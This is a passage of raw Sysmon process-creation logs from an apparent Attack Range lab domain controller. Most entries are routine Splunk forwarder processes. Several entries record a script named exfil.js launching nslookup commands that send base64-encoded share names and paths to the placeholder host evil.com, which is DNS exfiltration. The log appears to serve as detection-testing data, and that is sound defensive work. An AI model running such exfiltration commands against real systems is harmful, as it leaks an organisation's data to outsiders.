Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069887Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:20.413{A8622C2F-59F0-6078-940E-00000000AE01}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069877Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:19.840{A8622C2F-59EF-6078-930E-00000000AE01}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069865Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:19.265{A8622C2F-59EF-6078-920E-00000000AE01}6076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069855Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:17.499{A8622C2F-59ED-6078-910E-00000000AE01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069845Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:16.816{A8622C2F-59EC-6078-900E-00000000AE01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069832Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:16.150{A8622C2F-59EC-6078-8F0E-00000000AE01}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069791Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:05.486{A8622C2F-59E1-6078-8E0E-00000000AE01}1348C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59E1-6078-8C0E-00000000AE01}6720C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsls.tmp 2>&1 154100x800000000000000069780Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:21:05.457{A8622C2F-59E1-6078-8C0E-00000000AE01}6720C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsls.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069727Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:53.076{A8622C2F-59D5-6078-8B0E-00000000AE01}6660C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59D5-6078-890E-00000000AE01}1800C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnvacxv.tmp 2>&1 154100x800000000000000069716Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:53.048{A8622C2F-59D5-6078-890E-00000000AE01}1800C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnvacxv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:35.392{A8622C2F-59C3-6078-880E-00000000AE01}3904C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59C3-6078-860E-00000000AE01}5344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlckwxq.tmp 2>&1 154100x800000000000000069639Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:35.364{A8622C2F-59C3-6078-860E-00000000AE01}5344C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlckwxq.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069589Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:22.982{A8622C2F-59B6-6078-850E-00000000AE01}6804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59B6-6078-830E-00000000AE01}3916C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlifcr.tmp 2>&1 154100x800000000000000069578Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:22.953{A8622C2F-59B6-6078-830E-00000000AE01}3916C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlifcr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069566Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:22.317{A8622C2F-59B6-6078-820E-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069545Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:20.564{A8622C2F-59B4-6078-810E-00000000AE01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069535Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:19.944{A8622C2F-59B3-6078-800E-00000000AE01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:19.262{A8622C2F-59B3-6078-7F0E-00000000AE01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069508Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:17.324{A8622C2F-59B1-6078-7E0E-00000000AE01}1408C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069498Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:16.644{A8622C2F-59B0-6078-7D0E-00000000AE01}6396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069488Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:16.129{A8622C2F-59B0-6078-7C0E-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:05.319{A8622C2F-59A5-6078-7B0E-00000000AE01}3176C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-59A5-6078-790E-00000000AE01}3868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgwljl.tmp 2>&1 154100x800000000000000069434Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:20:05.291{A8622C2F-59A5-6078-790E-00000000AE01}3868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgwljl.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:52.896{A8622C2F-5998-6078-780E-00000000AE01}1476C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5998-6078-760E-00000000AE01}636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlduh.tmp 2>&1 154100x800000000000000069372Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:52.868{A8622C2F-5998-6078-760E-00000000AE01}636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlduh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069292Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:35.217{A8622C2F-5987-6078-750E-00000000AE01}4268C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5987-6078-730E-00000000AE01}6824C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsfc.tmp 2>&1 154100x800000000000000069281Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:35.188{A8622C2F-5987-6078-730E-00000000AE01}6824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsfc.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000069231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:22.810{A8622C2F-597A-6078-720E-00000000AE01}5308C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-597A-6078-700E-00000000AE01}6240C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwfmmxo.tmp 2>&1 154100x800000000000000069220Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:22.782{A8622C2F-597A-6078-700E-00000000AE01}6240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwfmmxo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000069211Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:22.321{A8622C2F-597A-6078-6F0E-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000069197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:19:20.583{A8622C2F-5978-6078-6E0E-00000000AE01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 